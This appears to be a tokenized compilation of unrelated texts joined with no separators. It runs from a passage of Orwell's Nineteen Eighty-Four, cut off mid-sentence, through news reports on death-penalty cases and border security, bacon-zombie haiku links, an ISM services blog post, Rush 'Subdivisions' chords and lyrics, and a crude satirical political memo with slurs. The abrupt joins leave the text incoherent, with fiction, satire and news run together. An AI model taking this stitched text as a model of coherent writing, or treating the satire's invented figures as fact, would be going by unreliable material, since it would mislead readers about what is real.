There were the armies of reference clerks whose job was simply to draw up lists of books and periodicals which were due for recall .
There were the vast repositories where the corrected documents were stored , and the hidden furnaces where the original copies were destroyed .
And somewhere or other , quite anonymous , there were the directing brains who co-ordinated the whole effort and laid down the lines of policy which made it necessary that this fragment of the past should be preserved , that one falsified , and the other rubbed out of existence .
And the Records Department , after all , was itself only a single branch of the Ministry of Truth , whose primary job was not to reconstruct the past but to supply the citizens of Oceania with newspapers , films , textbooks , telescreen programmes , plays , novels — with every conceivable kind of information , instruction , or entertainment , from a statue to a slogan , from a lyric poem to a biological treatise , and from a child 's spelling - book to a Newspeak dictionary .
And the Ministry had not only to supply the multifarious needs of the party , but also to repeat the whole operation at a lower level for the benefit of the proletariat .
There was a whole chain of separate departments dealing with proletarian literature , music , drama , and entertainment generally .
Here were produced rubbishy newspapers containing almost nothing except sport , crime and astrology , sensational five - cent novelettes , films oozing with sex , and sentimental songs which were composed entirely by mechanical means on a special kind of kaleidoscope known as a versificator .
There was even a whole sub-section — Pornosec , it was called in Newspeak — engaged in producing the lowest kind of pornography , which was sent out in sealed packets and which no Party member , other than those who worked on it , was permitted to look at .
Three messages had slid out of the pneumatic tube while Winston was working , but they were simple matters , and he had disposed of them before the Two Minutes Hate interrupted him .
When the Hate was over he returned to his cubicle , took the Newspeak dictionary from the shelf , pushed the speakwrite to one side , cleaned his spectacles , and settled down to his main job of the morning .
Winston 's greatest pleasure in life was in his work .
Most of it was a tedious routine , but included in it there were also jobs so difficult and intricate that you could lose yourself in them as in the depths of a mathematical problem — delicate pieces of forgery in which you had nothing to guide you except your knowledge of the principles of Ingsoc and your estimate of what the Party wanted you to say .
Winston was good at this kind of thing .
On occasion he had even been entrusted with the rectification of the Times leading articles , which were written entirely in Newspeak .
He unrolled the message that he had set aside earlier .
It ran :
times 3.12.83 reporting bb dayorder doubleplusungood refs unpersons rewrite fullwise upsub antefiling
In Oldspeak ( or standard English ) this might be rendered :
The reporting of Big Brother 's Order for the Day in the Times of December 3rd 1983 is extremely unsatisfactory and makes references to non-existent persons .
Rewrite it in full and submit your draft to higher authority before filing .
Winston read through the offending article .
Big Brother 's Order for the Day , it seemed , had been chiefly devoted to praising the work of an organization known as FFCC , which supplied cigarettes and other comforts to the sailors in the Floating Fortresses .
A certain Comrade Withers , a prominent member of the Inner Party , had been singled out for special mention and awarded a decoration , the Order of Conspicuous Merit , Second Class .
Three months later FFCC had suddenly been dissolved with no reasons given .
One could assume that Withers and his associates were now in disgrace , but there had been no report of the matter in the Press or on the telescreen .
That was to be expected , since it was unusual for political offenders to be put on trial or even publicly denounced .
The great purges involving thousands of people , with public trials of traitors and thought - criminals who made abject confession of their crimes and were afterwards executed , were special show - pieces not occurring oftener than once in a couple of years .
More commonly , people who had incurred the displeasure of the Party simply disappeared and were never heard of again .
One never had the smallest clue as to what had happened to them .
In some cases they might not even be dead .
Perhaps thirty people personally known to Winston , not counting his parents , had disappeared at one time or another .
Winston stroked his nose gently with a paper - clip .
In the cubicle across the way Comrade Tillotson was still crouching secretively over his speakwrite .
He raised his head for a moment : again the hostile spectacle - flash .
Winston wondered whether Comrade Tillotson was engaged on the same job as himself .
It was perfectly possible .
So tricky a piece of work would never be entrusted to a single person : on the other hand , to turn it over to a committee would be to admit openly that an act of fabrication was taking place .
Very likely as many as a dozen people were now working away on rival versions of what Big Brother had actually said .
And presently some master brain in the Inner Party would select this version or that , would re-edit it and set in motion the complex processes of cross-referencing that would be required , and then the chosen lie would pass into the permanent records and become truth .
Winston did not know why Withers had been disgraced .
Perhaps it was for corruption or incompetence .
Perhaps Big Brother was merely getting rid of a too - popular subordinate .
Perhaps
Withers or someone close to him had been suspected of heretical tendencies .
Or perhaps — what was likeliest of all — the thing had simply happened because purges and vaporizations were a necessary part of the mechanics of government .
The only real clue lay in the words ‘ refs unpersons ’ , which indicated that Withers was already dead .
You could not invariably assume this to be the case when people were arrested .
Sometimes they were released and allowed to remain at liberty for as much as a year or two years before being executed .
Very occasionally some person whom you had believed dead long since would make a ghostly reappearance at some public trial where he would implicate hundreds of others by his testimony before vanishing , this time for ever .
Withers , however , was already an unperson .
He did not exist : he had never existed .
Winston decided that it would not be enough simply to reverse the tendency of Big Brother 's speech .
It was better to make it deal with something totally unconnected with its original subject .
He might turn the speech into the usual denunciation of traitors and thought - criminals , but that was a little too obvious , while to invent a victory at the front , or some triumph of over - production in the Ninth Three - Year Plan , might complicate the records too much .
What was needed was a piece of pure fantasy .
Suddenly there sprang into his mind , ready made as it were , the image of a certain Comrade Ogilvy , who had recently died in battle , in heroic circumstances .
There were occasions when Big Brother devoted his Order for the Day to commemorating some humble , rank - and - file Party member whose life and death he held up as an example worthy to be followed .
Today he should commemorate Comrade Ogilvy .
It was true that there was no such person as Comrade Ogilvy , but a few lines of print and a couple of faked photographs would soon bring him into existence .
Winston thought for a moment , then pulled the speakwrite towards him and began dictating in Big Brother 's familiar style : a style at once military and pedantic , and , because of a trick of asking questions and then promptly answering them ( ‘ What lessons do we learn from this fact , comrades ?
The lesson — which is also one of the fundamental principles of Ingsoc — that , ’ etc. , etc. ) , easy to imitate .
At the age of three Comrade Ogilvy had refused all toys except a drum , a sub- machine gun , and a model helicopter .
At six — a year early , by a special relaxation of the rules — he had joined the Spies , at nine he had been a troop leader .
At eleven he had denounced his uncle to the Thought Police after overhearing a conversation which appeared to him to have criminal tendencies .
At seventeen he had been a district organizer of the Junior Anti-Sex League .
At nine teen he had designed a hand - grenade which had been adopted by the Ministry of Peace and which , at its first trial , had killed thirty - one Eurasian prisoners in one burst .
At twenty - three he had perished in action .
Pursued by enemy jet planes while flying over the Indian Ocean with important despatches , he had weighted his body with his machine gun and leapt out of the helicopter into deep water , despatches and all — an end , said Big Brother , which it was impossible to contemplate without feelings of envy .
Big Brother added a few remarks on the purity and single - mindedness of Comrade Ogilvy 's life .
He was a total abstainer and a nonsmoker , had no recreations except a daily hour in the gymnasium , and had taken a vow of celibacy , believing marriage and the care of a family to be incompatible with a twenty - four - hour - a - day devotion to duty .
He had no subjects of conversation except the principles of Ingsoc , and no aim in life except the defeat of the Eurasian enemy and the hunting - down of spies , saboteurs , thoughtcriminals , and traitors generally .
Winston debated with himself whether to award Comrade Ogilvy the Order of Conspicuous Merit : in the end he decided against it because of the unnecessary cross-referencing that it would entail .
Once again he glanced at his rival in the opposite cubicle .
Something seemed to tell him with certainty that Tillotson was busy on the same job as himself .
There was no way of knowing whose job would finally be adopted , but he felt a profound conviction that it would be his own .
Comrade Ogilvy , unimagined an hour ago , was now a fact .
It struck him as curious that you could create dead men but not living ones .
Comrade Ogilvy , who had never existed in the present , now existed in the past , and when once the act of forgery was forgotten , he would exist just as authentically , and upon the same evidence , as Charlemagne or Julius Caesar .
In the low - ceilinged canteen , deep underground , the lunch queue jerked slowly forward .
The room was already very full and deafeningly noisy .
From the grille at the counter the steam of stew came pouring forth , with a sour metallic smell which did not quite overcome the fumes of Victory Gin .
On the far side of the room there was a small bar , a mere hole in the wall , where gin could be bought at ten cents the large nip .
‘ Just the man I was looking for , ’ said a voice at Winston 's back .
He turned round .
It was his friend Syme , who worked in the Research Department .
Perhaps ‘ friend ’ was not exactly the right word .
You did not have friends nowadays , you had comrades : but there were some comrades whose society was pleasanter than that of others .
Syme was a philologist , a specialist in Newspeak .
Indeed , he was one of the enormous team of experts now engaged in compiling the Eleventh Edition of the Newspeak Dictionary .
He was a tiny creature , smaller than Winston , with dark hair and large , protuberant eyes , at once mournful and derisive , which seemed to search your face closely while he was speaking to you .
‘ I wanted to ask you whether you 'd got any razor blades , ’ he said .
‘ Not one ! ’ said Winston with a sort of guilty haste .
‘ I 've tried all over the place .
They do n't exist any longer . ’
Everyone kept asking you for razor blades .
Actually he had two unused ones which he was hoarding up .
There had been a famine of them for months past .
At any given moment there was some necessary article which the Party shops were unable to supply .
Sometimes it was buttons , sometimes it was darning wool , sometimes it was shoelaces ; at present it was razor blades .
You could only get hold of them , if at all , by scrounging more or less furtively on the ‘ free ’ market .
‘ I 've been using the same blade for six weeks , ’ he added untruthfully .
The queue gave another jerk forward .
As they halted he turned and faced Syme again .
Each of them took a greasy metal tray from a pile at the end of the counter .
‘ Did you go and see the prisoners hanged yesterday ? ’ said Syme .
‘ I was working , ’ said Winston indifferently .
‘ I shall see it on the flicks , I suppose . ’
‘ A very inadequate substitute , ’ said Syme .
His mocking eyes roved over Winston 's face .
‘ I know you , ’ the eyes seemed to say , ‘ I see through you .
I know very well why you did n't go to see those prisoners hanged . ’
In an intellectual way , Syme was venomously orthodox .
He would talk with a disagreeable gloating satisfaction of helicopter raids on enemy villages , and trials and confessions of thought - criminals , the executions in the cellars of the Ministry of Love .
Talking to him was largely a matter of getting him away from such subjects and entangling him , if possible , in the technicalities of Newspeak , on which he was authoritative and interesting .
Winston turned his head a little aside to avoid the scrutiny of the large dark eyes .
‘ It was a good hanging , ’ said Syme reminiscently .
‘ I think it spoils it when they tie their feet together .
I like to see them kicking .
And above all , at the end , the tongue sticking right out , and blue — a quite bright blue .
That 's the detail that appeals to me . ’
‘ Nex ' , please ! ’ yelled the white - aproned prole with the ladle .
Winston and Syme pushed their trays beneath the grille .
On to each was dumped swiftly the regulation lunch — a metal pannikin of pinkish - grey stew , a hunk of bread , a cube of cheese , a mug of milkless Victory Coffee , and one saccharine tablet .
‘ There 's a table over there , under that telescreen , ’ said Syme .
‘ Let 's pick up a gin on the way . ’
The gin was served out to them in handleless china mugs .
They threaded their way across the crowded room and unpacked their trays on to the metal - topped table , on one corner of which someone had left a pool of stew , a filthy liquid mess that had the appearance of vomit .
Winston took up his mug of gin , paused for an instant to collect his nerve , and gulped the oily - tasting stuff down .
When he had winked the tears out of his eyes he suddenly discovered that he was hungry .
He began swallowing spoonfuls of the stew , which , in among its general sloppiness , had cubes of spongy pinkish stuff which was probably a preparation of meat .
Neither of them spoke again till they had emptied their pannikins .
From the table at Winston 's left , a little behind his back , someone was talking rapidly and continuously , a harsh gabble almost like the quacking of a duck , which pierced the general uproar of the room .
‘ How is the Dictionary getting on ? ’ said Winston , raising his voice to overcome the noise .
‘ Slowly , ’ said Syme .
‘ I 'm on the adjectives .
It 's fascinating . ’
He had brightened up immediately at the mention of Newspeak .
He pushed his pannikin aside , took up his hunk of bread in one delicate hand and his cheese in the other , and leaned across the table so as to be able to speak without shouting .
‘ The Eleventh Edition is the definitive edition , ’ he said .
‘ We 're getting the language into its final shape — the shape it 's going to have when nobody speaks anything else .
When we 've finished with it , people like you will have to learn it all over again .
You think , I dare say , that our chief job is inventing new words .
But not a bit of it !
We 're destroying words — scores of them , hundreds of them , every day .
We 're cutting the language down to the bone .
The Eleventh Edition wo n't contain a single word that will become obsolete before the year 2050 . ’
He bit hungrily into his bread and swallowed a couple of mouthfuls , then continued speaking , with a sort of pedant 's passion .
His thin dark face had become animated , his eyes had lost their mocking expression and grown almost dreamy .
‘ It 's a beautiful thing , the destruction of words .
Of course the great wastage is in the verbs and adjectives , but there are hundreds of nouns that can be got rid of as well .
It is n't only the synonyms ; there are also the antonyms .
After all , what justification is there for a word which is simply the opposite of some other word ?
A word contains its opposite in itself .
Take “ good ” , for instance .
If you have a word like “ good ” , what need is there for a word like “ bad ” ?
“ Ungood ” will do just as well — better , because it's an exact opposite , which the other is not .
Or again , if you want a stronger version of “ good ” , what sense is there in having a whole string of vague useless words like “ excellent ” and “ splendid ” and all the rest of them ?
“ Plusgood ” covers the meaning , or “ doubleplusgood ” if you want something stronger still .
Of course we use those forms already .
but in the final version of Newspeak there 'll be nothing else .
In the end the whole notion of goodness and badness will be covered by only six words — in reality , only one word .
do n't you see the beauty of that , Winston ?
It was B. B.'s idea originally , of course , ’ he added as an afterthought .
A sort of vapid eagerness flitted across Winston 's face at the mention of Big Brother .
Nevertheless
Syme immediately detected a certain lack of enthusiasm .
‘ You have n't a real appreciation of Newspeak , Winston , ’ he said almost sadly .
‘ Even when you write it you 're still thinking in Oldspeak .
I 've read some of those pieces that you write in the Times occasionally .
They 're good enough , but they 're translations .
In your heart you 'd prefer to stick to Oldspeak , with all its vagueness and its useless shades of meaning .
You do n't grasp the beauty of the destruction of words .
Do you know that Newspeak is the only language in the world whose vocabulary gets smaller every year ? ’
Winston did know that , of course .
He smiled , sympathetically he hoped , not trusting himself to speak .
Syme bit off another fragment of the dark - coloured bread , chewed it briefly , and went on :
‘ Do n't you see that the whole aim of Newspeak is to narrow the range of thought ?
In the end we shall make thoughtcrime literally impossible , because there will be no words in which to express it .
Every concept that can ever be needed , will be expressed by exactly one word , with its meaning rigidly defined and all its subsidiary meanings rubbed out and forgotten .
Already , in the Eleventh Edition , we 're not far from that point .
But the process will still be continuing long after you and I are dead .
Every year fewer and fewer words , and the range of consciousness always a little smaller .
Even now , of course , there 's no reason or excuse for committing thoughtcrime .
It 's merely a question of self - discipline , reality - control .
But in the end there wo n't be any need even for that .
The Revolution will be complete when the language is perfect .
Newspeak is Ingsoc and Ingsoc is Newspeak , ’ he added with a sort of mystical satisfaction .
‘ Has it ever occurred to you , Winston , that by the year 2050 , at the very latest , not a single human being will be alive who could understand such a conversation as we are having now ? ’
‘ Except — ’ began Winston doubtfully , and he stopped .
It had been on the tip of his tongue to say ‘ Except the proles , ’ but he checked himself , not feeling fully certain that this remark was not in some way unorthodox .
Syme , however , had divined what he was about to say .
‘ The proles are not human beings , ’ he said carelessly .
‘ By 2050 — earlier , probably — all real knowledge of Oldspeak will have disappeared .
The whole literature of the past will have been destroyed .
Chaucer , Shakespeare , Milton , Byron — they 'll exist only in Newspeak versions , not merely changed into something different , but actually changed into something contradictory of what they used to be .
Even the literature of the Party will change .
Even the slogans will change .
How could you have a slogan like “ freedom is slavery ” when the concept of freedom has been abolished ?
The whole climate of thought will be different .
In fact there will be no thought , as we understand it now .
Orthodoxy means not thinking — not needing to think .
Orthodoxy is unconsciousness .’
One of these days , thought Winston with sudden deep conviction , Syme will be vaporized .
He is too intelligent .
He sees too clearly and speaks too plainly .
The Party does not like such people .
One day he will disappear .
It is written in his face .
Winston had finished his bread and cheese .
He turned a little sideways in his chair to drink his mug of coffee .
At the table on his left the man with the strident voice was still talking remorselessly away .
A young woman who was perhaps his secretary , and who was sitting with her back to Winston , was listening to him and seemed to be eagerly agreeing with everything that he said .
From time to time Winston caught some such remark as ‘ I think you 're so right , I do so agree with you ’ , uttered in a youthful and rather silly feminine voice .
But the other voice never stopped for an instant , even when the girl was speaking .
Winston knew the man by sight , though he knew no more about him than that he held some important post in the Fiction Department .
He was a man of about thirty , with a muscular throat and a large , mobile mouth .
His head was thrown back a little , and because of the angle at which he was sitting , his spectacles caught the light and presented to Winston two blank discs instead of eyes .
What was slightly horrible , was that from the stream of sound that poured out of his mouth it was almost impossible to distinguish a single word .
Just once Winston caught a phrase — ‘ complete and final elimination of Goldsteinism ’ — jerked out very rapidly and , as it seemed , all in one piece , like a line of type cast solid .
For the rest it was just
The US Supreme Court on Wednesday stayed the execution of a convicted murderer in Texas less than an hour before he was due to die after a plea from France and his lawyers to allow further DNA tests .
Henry “ Hank ” Skinner claims that new DNA tests will prove he did not commit the New Year ’s Eve 1993 triple murder for which he was sentenced to death .
ADVERTISEMENT
“ He said he did n’t expect to get a stay , he expected to be executed , ” Texas Department of Criminal Justice spokesman Jason Clark said .
Upon hearing news of the stay , Clark said , Skinner “ felt weak in the knees , he felt like he really won . ”
Skinner , 47 , who is now married to a French anti-death penalty campaigner , was convicted in Texas at a 1995 jury trial for the killings of his girlfriend and her two sons in his home .
He had been scheduled to be executed by lethal injection at 6:00 pm ( 2300 GMT ) at the prison in Huntsville , Texas .
The Supreme Court must now decide if it will take up the case on the merits , otherwise a new execution date will be decided , the justices said in a brief decision .
ADVERTISEMENT
“ We are relieved that the US Supreme Court has intervened to prevent Mr. Skinner ’s execution , ” said defense attorney Rob Owen .
The stay “ suggests that the court believes there are important issues that require closer examination .
“ We remain hopeful that the court will agree to hear Mr. Skinner ’s case and ultimately allow him the chance to prove his innocence through DNA testing , ” Owen said .
ADVERTISEMENT
Skinner , who has proclaimed his innocence since his arrest , claims that DNA testing on items that were not examined during his trial will clear him .
Earlier Wednesday the French ambassador in Washington contacted Texas Governor Rick Perry urging a stay of execution .
ADVERTISEMENT
Both French President Nicolas Sarkozy and Foreign Minister Bernard Kouchner have expressed their support to Skinner ’s French wife , Sandrine Ageorges - Skinner .
“ Our ambassador in Washington has contacted the governor of Texas to request a reprieve for Mr. Skinner and that his request for an additional inquiry be accepted , ” said foreign ministry spokesman Bernard Valero .
France abolished capital punishment in 1981 .
ADVERTISEMENT
The Texas Board of Pardon and Paroles on Sunday rejected Skinner ’s DNA test request , leaving his fate in the hands of the US Supreme Court and Governor Perry .
In recent years , 17 US death row prisoners have been released after DNA testing proved their innocence .
Some DNA evidence was presented during Skinner ’s trial to ascertain that he had been present in his home in the Texas town of Pampa when the murders were committed — a point the defense never contested .
But he says that a third person must have committed the murders because he had passed out under the influence of anti-anxiety medication , painkillers and alcohol at the time .
Blood tests at the time confirmed the presence of the drugs in his bloodstream .
ADVERTISEMENT
Skinner ’s defense insists he was physically incapable of killing his girlfriend Twila Jean Busby , 40 — who was fatally beaten with an axe handle — and her two sons aged 20 and 22 who were stabbed to death .
Ten years ago Skinner attracted the support of David Protess , a journalism professor at Northwestern University , who re-examined the case with his students and the DNA evidence , and concluded Skinner is innocent .
The journalism professor also noted that Skinner ’s alleged victim had complained on the night of the murder of being harassed by her uncle , who was not questioned during the investigation into her murder .
1 ) " Breakfast of the dead Brains are fine for you maybe Not bacon zombie . "
http://baconhaikus.wordpress.com/2009/01/05/bacon-haikus-vol-1-no-8/
" This haiku here is awesome because it combines bacon haiku and zombies , another favorite of mine .
Would a zombie really choose bacon over brains ?
A smart zombie would .
A smart BACON zombie would . "
Source and further information : http://www.royalbaconsociety.com/blog/funny-bacon/bacon-haikus-and-zombies/
2 ) " No way I am eating a freaking zombie .
All zombies must be destroyed .
Zombies are only good for being a pain in the ass .
The only way bacon can be a pain in the ass is when I can't eat anymore and I have left over bacon .
What if the zombies were made of bacon ?
What if the only way to destroy the bacon zombie was to eat them ?
If you bit a bacon zombie and died , only to become a bacon zombie yourself , would you eat yourself ? "
Source and further information : http://www.2old2play.com/modules.php?name=Forums&file=viewtopic&p=558162
3 ) Further information : http://fashionablygeek.com/t-shirts/the-bacon-zombies-dilemma/
http://foodproof.com/blogs/view/post/bacon-man-435
http://packetwaste.com/2009/04/bacon-zombies/
- " What Do Bacon , Zombies and Commies All Have in Common ? " :
http://newsblaze.com/story/20080909163759rocc.nb/topstory.html
- " Drunken bacon zombies something something " : http://www.theunmom.com/2009/04/drunken-bacon-zombies-something.html
The service sector is in expansion for the second straight month , with the diffusion index sitting at 53 .
Anything over 50 is in expansion .
Let 's take a look at some tables from the February 2010 Non-Manufacturing ISM Report On Business® .
* Non-Manufacturing ISM Report On Business® data is seasonally adjusted for Business Activity , New Orders , Prices and Employment .
Manufacturing ISM Report On Business® data is seasonally adjusted for New Orders , Production , Employment , Supplier Deliveries and Inventories .
** Number of months moving in current direction
NMI ( Non-Manufacturing Index )
In February , the NMI registered 53 percent , indicating growth in the non-manufacturing sector for the second consecutive month .
A reading above 50 percent indicates the non-manufacturing sector economy is generally expanding ; below 50 percent indicates the non-manufacturing sector is generally contracting .
NMI HISTORY
INDUSTRY PERFORMANCE
( Based on the NMI )
The nine industries reporting growth in February based on the NMI composite index — listed in order — are : Information ; Arts , Entertainment & Recreation ; Transportation & Warehousing ; Public Administration ; Professional , Scientific & Technical Services ; Other Services ; Retail Trade ; Wholesale Trade ; and Finance & Insurance .
The eight industries reporting contraction in February — listed in order — are : Educational Services ; Health Care & Social Assistance ; Management of Companies & Support Services ; Construction ; Utilities ; Accommodation & Food Services ; Real Estate , Rental & Leasing ; and Mining .
City , State Cutbacks Coming
In an amazingly candid appraisal of the sorry state of affairs in New Jersey , Governor Chris Christie laid it on the line in a speech to about 200 mayors at the New Jersey League of Municipalities .
The speech is 24 minutes long and well worth a listen because it is both an honest admission of the problem , and a refreshingly accurate appraisal of what the solutions are .
He chastised the legislature , unions , municipalities , and affordable housing initiatives while promising to do something about all of those .
Points Covered
He froze aid to schools
Challenged school boards .
Wants to change arbitration rules for public workers
Requests public - private salary and benefits parity
Demands pension reform
Property tax hikes not an option
Wants to get rid of programs like COAH
Is not thinking about the next election
15,000 Layoffs Coming In San Francisco
As many as 15,000 unionized city workers are anticipating layoffs on Friday in part of a work - week reduction plan in which most of them will be re-hired at reduced , 37.5 - hour weeks .
The 3,000 - strong Local 21 , meanwhile , claims that such a forced work week reduction would be a violation of their contract -- though labor says the City Attorney disagrees .
Vallejo promised " We 'll lawyer up " if members are dismissed as part of the 37.5 - hour scheme .
.. As we can see from the desperate economic and fiscal woes of California , New Jersey , New York and other states with dominant public unions ; this has become a major problem for the U.S. economy and smaller “ d ” democratic governance .
The agenda for American political reform needs to include the breaking of public unions ' power to capture an even larger share of private income .
Services Employment
Employment activity in the non-manufacturing sector contracted in February for the 26th consecutive month .
ISM 's Non-Manufacturing Employment Index for February registered 48.6 percent .
This reflects an increase of 4 percentage points when compared to the seasonally adjusted 44.6 percent registered in January .
Two industries reported increased employment , nine industries reported decreased employment , and seven industries reported unchanged employment compared to January .
The industries reporting an increase in employment in February are : Retail Trade ; and Transportation & Warehousing .
The industries reporting a reduction in employment in February — listed in order — are : Educational Services ; Real Estate , Rental & Leasing ; Mining ; Accommodation & Food Services ; Utilities ; Health Care & Social Assistance ; Information ; Public Administration ; and Wholesale Trade .
Inventory Replenishment
Public Sector About To Play Catchup
Subdivisions
Intro : F# Bm A Bm A F# Bm A Bm A Bm A G A Bm G A Bm G A Bm G A Bm F# F# Sprawling on the fringes of the city Bm A In geometric order Bm A An insulated border Bm A In between the bright lights G A Bm G A F#
And the far unlit unknown F# Growing up it all seems so one - sided Bm A Opinions all provided Bm A The future pre-decided Bm A Detached and subdivided G A Bm
In the mass production zone G A Bm G A Bm Nowhere is the dreamer or the misfit so alone ( Subdivisions ) G A Bm
In the high school halls G A Bm
In the shopping malls G A Bm Conform or be cast out ( Subdivisions ) G A Bm
In the basement bars G A Bm
In the backs of cars G A Bm Be cool or be cast out G A Bm Any escape might help to smooth A Bm The unattractive truth A G A Bm
But the suburbs have no charms to soothe A Bm The restless dreams of youth ( G A Bm A Bm A ) ( F# ) F# Drawn like moths we drift into the city Bm A The timeless old attraction Bm A Cruising for the action Bm A Lit up like a firefly G A Bm G A F# Just to feel the living night F# Some will sell their dreams for small desires Bm A Or lose the race to rats Bm A Get caught in ticking traps Bm A And start to dream of somewhere G A Bm To relax their restless flight G A Bm G A Bm Somewhere out of a memory of lighted streets on quiet nights ... ( Subdivisions ) G A Bm
In the high school halls G A Bm
In the shopping malls G A Bm Conform or be cast out ( Subdivisions ) G A Bm
In the basement bars G A Bm
In the backs of cars G A Bm G A Bm
Be cool or be cast out ( G A Bm A Bm A ) ( G A Bm ) G A Bm Any escape might help to smooth A Bm The unattractive truth A G A Bm
But the suburbs have no charms to soothe A Bm The restless dreams of youth G A F#m G A Bm G A F#m G A Bm D G A F#m G A Bm G A F#m G A Bm D G A Bm G A F#m G G G G
( CNN ) -- Amnesty International is calling on Saudi Arabia 's King Abdullah to stop the execution of a Lebanese man sentenced to death for " sorcery . "
In a statement released Thursday , the international rights group condemned the verdict and demanded the immediate release of Ali Hussain Sibat , former host of a popular call - in show that aired on Sheherazade , a Beirut based satellite TV channel .
According to his lawyer , Sibat , who is 48 and has five children , would predict the future on his show and give out advice to his audience .
The attorney , May El Khansa , who is in Lebanon , tells CNN her client was arrested by Saudi Arabia 's religious police ( known as the Mutawa 'een ) and charged with sorcery while visiting the country in May 2008 .
Sibat was in Saudi Arabia to perform the Islamic religious pilgrimage known as Umra .
Sibat was then put on trial .
In November 2009 , a court in the Saudi city of Medina found Sibat guilty and sentenced him to death .
According to El Khansa , Sibat appealed the verdict .
The case was taken up by the Court of Appeal in the Saudi city of Mecca on the grounds that the initial verdict was " premature . "
El Khansa tells CNN that the Mecca appeals court then sent the case back to the original court for reconsideration , stipulating that all charges made against Sibat needed to be verified and that he should be given a chance to repent .
On March 10 , judges in Medina upheld their initial verdict , meaning Sibat is once again sentenced to be executed .
" The Medina court refused the sentence of the appeals court , " said El Khansa , adding her client will appeal the verdict once more .
Sibat 's wife , Samira Rahmoon told CNN she has not seen her husband and has no idea of his health .
" I have n't seen my husband in two years .
I do n't know if he 's eating .
I do n't know if he 's healthy .
I do n't know how he looks .
This has been very difficult .
I do n't even have enough money to be able to travel to Saudi Arabia to see him , " she said .
" I do n't have anything against the Saudi government .
I just want to see my husband again . "
The case has been covered extensively by local media .
According to Arab News , an English language Saudi daily newspaper , after the most recent verdict was issued , the judges in Medina issued a statement expressing that Sibat deserved to be executed for having continually practiced black magic on his show , adding that this sentence would deter others from practicing sorcery .
Arab News reports that the case will now return to the appeals court in Mecca .
CNN has not been able to reach Saudi Arabia 's Ministry of Justice for comment .
OK look , I 'm knackered .
I 'm as cranky as Janette Krankie was when she found out there was a new Jimmy Krankie auditioning and stayed up all night doing crank .
I 've been up for 36 hours trying to get my head round the debate numbers .
I 've read the whole of Twitter .
I 've watched both Dimblebuds , QT , all the local news .
Rewound the worm polls , and checked the backgrounds of the focus group members .
And still hungry for the red meat of reaction at 6.30 am , I put the paper lad in a half - nelson and made him give me three key words on each party leader 's performance .
The good news is he was very encouraging .
We may also need to sort out a quiet visit to Harley Street re a compacted shoulder joint .
As you know , I always said Clegg would be a formidable opponent .
Any suggestion he would be a mere Weetabix with a Dictaphone sellotaped to him was to put you at your ease .
I always said the debates were going to be game changers .
They were exciting , they were engaging , and we should see if there is any possible way in the world for us to get the fuck out of the rest of them .
Obviously we can't lead on this .
But can we have a back - channel chat and see if we can't get the Tories to withdraw , claiming that public debates over policy are a distraction from the real business of debating policy publicly ?
Clegg : I know there 's a view that Clegg winning is OK for us .
And I was fine with Peter running Spin Alley .
You need control .
You can't just have a bunch of cabinet ministers bouncing around the room like bollocks in a tumble drier .
And journalists like Peter .
People feel they know where they are with a sociopath .
But the thing about promoting the Yellow Surge is that although a tidal wave of piss obviously sounds very attractive , everyone can get soaked .
It 's all a great laugh when the Tories are seeing their cocks cut off into their pints of cider in the West Country .
Not so funny when we get kicked in the bollocks in the Ribble .
Hot Buttons : I think in the world where the man with the golden tie is doing well we may need to reposition ourselves on some hot button issues .
On gays and Europe there has been a residual fear that if we point out too much that the Tories are homophobes and xenophobes we will deliver unto ourselves the liberals and the homos and the people who have three kinds of olive oil , but these may actually be outweighed in this great country of ours by the queer - bashers and closet racists – so our moral stand could leave us marginally worse off .
That 's not the kind of moral stand I like .
Let 's all stamp on a paedo .
That 's my kind of brave crusade .
I 've looked at the numbers and the maths are difficult to calculate even using Mosaic , but if we look at proxy questions like " Are you relaxed about the introduction of new varieties of breakfast cereal ? " ( 87 % of homophobes are n't ) or " Would you agree with the statement that in general the Cox 's Orange Pippin is superior to the avocado pear ? " ( 79 % of racists hold this view ) compared with the numbers who agree 3 - D films are primarily an innovation to drive up cinema revenue ( 83 % liberal ) , then it does seem that this nation is actually basically decent , so far as we can tell .
But only marginally .
One thing we know for certain is that the people of this country do not enjoy humour or fair play .
These are our defining national characteristics .
Polling suggests the public are more comfortable with the humourless and want to escape economic pain for themselves while others pay the price .
They just very much like to be told they enjoy humour and fair play .
Remember this next time around .
No jokes .
It 's going to be tough .
But not for you .
Finally .
Just a note regarding the repeated claim that this is going to be at some point the dirtiest election campaign in history .
Please , can people stop saying this shit to me unless they mean it , because you know how excited it gets me .
Regards , Malcolm .
• More election comment from Cif at the polls
Signaling a major shift from her predecessor , Homeland Security Secretary Janet Napolitano on Tuesday said she will spend $ 50 million of stimulus funds originally intended to build a “ virtual fence ” along the 2,000 - mile U.S. - Mexico border on other more proven and cost - effective security technology .
The decision to pull back funding on the initiative aimed at protecting the U.S. from terrorists , violent drug smugglers and illegal immigrants comes on the heels of a series of damning reports by the Government Accountability Office , and as Ms. Napolitano attempts to justify to lawmakers a 30 percent budget reduction for U.S. Customs and Border Protection ( CBP ) in the midst of a raging drug war along the Southwest border .
To date , the U.S. government , through the Secure Border Initiative , has paid Boeing Co. more than $ 1 billion to build less than 700 miles of barriers between ports of entry , and a costly but flawed system of radar towers , ground sensors and cameras known as SBInet , a $ 4 billion project that appears to be in jeopardy .
“ Not only do we have an obligation to secure our borders , we have a responsibility to do so in the most cost - effective way possible , ” Ms. Napolitano said .
“ The system of sensors and cameras along the Southwest border known as SBInet has been plagued with cost overruns and missed deadlines . ”
Ms. Napolitano said the department will instead use $ 50 million of stimulus funding originally allocated for the first phase of SBInet to buy security technology such as mobile surveillance , thermal - imaging devices , body scanning units , mobile radios , cameras and laptops for pursuit vehicles .
On Jan. 15 , Ms. Napolitano said the department was reassessing the SBInet program .
She said she had directed David V. Aguilar , acting CBP commissioner , to re-evaluate its implementation .
She said the order was due to her “ ongoing concerns about SBInet , ” including what she called “ unacceptable delays ” in the project ’s completion .
She said at the time that Homeland Security would decide based on that reassessment whether to recompete the contract , extend the contract or try something different .
On Tuesday , she said , “ We are freezing all SBInet funding beyond the initial deployment to the Tucson and Ajo regions until the assessment I ordered in January is completed . ”
The Washington Times examined GAO reports on the project and reported on March 1 that government officials were unable to say when , how or whether SBInet would ever be completed .
Ms. Napolitano ’s announcement Tuesday met with mixed reactions from lawmakers and representatives of rank and file border patrol officers .
“ I ’m all for securing our border , but haphazardly pulling the rug out from underneath SBINet to fund some other unplanned projects , suggests we ’re back to throwing money at problems , not relying on strategic decisions on utilizing the taxpayers ’ money , ” said Rep. Harold Rogers , Kentucky Republican and ranking member of the House Appropriations subcommittee on homeland security .
